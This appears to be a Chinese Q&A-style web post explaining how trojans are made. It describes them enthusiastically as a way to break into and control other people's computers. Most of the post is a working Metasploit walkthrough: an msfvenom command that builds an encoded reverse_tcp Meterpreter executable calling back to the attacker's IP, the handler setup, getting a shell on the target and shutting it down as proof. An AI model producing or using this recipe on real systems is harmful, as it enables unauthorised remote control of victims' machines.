计算机木马是如何产生的?原理是什么?

谢邀~~
了解过木马或者病毒的人都知道木马是个非常强大的工具,其中最让人兴奋的功能就是可以侵入别人的电脑,然后获取该电脑的权限,得到权限之后电脑基本上就在你的掌控之中了

本文最后更新时间:  2023-05-05 18:46:56

谢邀~~

了解过木马或者病毒的人都知道木马是个非常强大的工具,其中最让人兴奋的功能就是可以侵入别人的电脑,然后获取该电脑的权限,得到权限之后电脑基本上就在你的掌控之中了。既然木马如此强大,那必定会有好奇如此强大\"神器\"是如何被制作出来的呢?现在,小编就带大家了解木马的基本制作过程!

用kali系统集成的metasploit工具来制作木马

1、打开kali系统,输入【msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST= \"执行攻击的电脑的IP\" LPORT= \"端口号可自行设置,但不要设为已经固定的端口号\" -f exe > abc.exe】命令。

出现下图信息表示已经生成木马,路径位于根目录下。

2、打开metasloit工具,输入【use exploit/multi/handler】和【set payload windows/meterpreter/reverse_tcp】命令进行模块的开启与相关的配置。

3、在靶机上面打开生成的木马

返回kali系统,查看反弹回来的信息。出现下图表示木马已经在靶机被打开了。

4、然后,就会自动进入到meterpreter模式,输入shell命令,就会获取靶机的shell权限,至此你已经获取了控制这台计算机的所有权限,前提是要你必要熟悉windows的DOS命令。

执行一个【shutdown -s】关机命令操作进行验证!靶机提示系统即将关机!

到这里我们已经完成了一个木马从制作到实现入侵功能的基本操作,但是这只是一个比较初级的反弹型木马,想要制作一些功能强大的木马,还需要各位读者自己深入研究,也非常欢迎读者在评论区留言,我们共同讨论,共同学习。

关注小编,我将定期为大家解答各类网络安全的疑惑,并且为大家带来网络安全的实用技术。大家如果对网络安全方面的问题也可以向小编提问,如果我知道的都会为大家竭力解答!

 1/2    1 2 下一页 尾页
温馨提示:内容均由网友自行发布提供,仅用于学习交流,如有版权问题,请联系我们。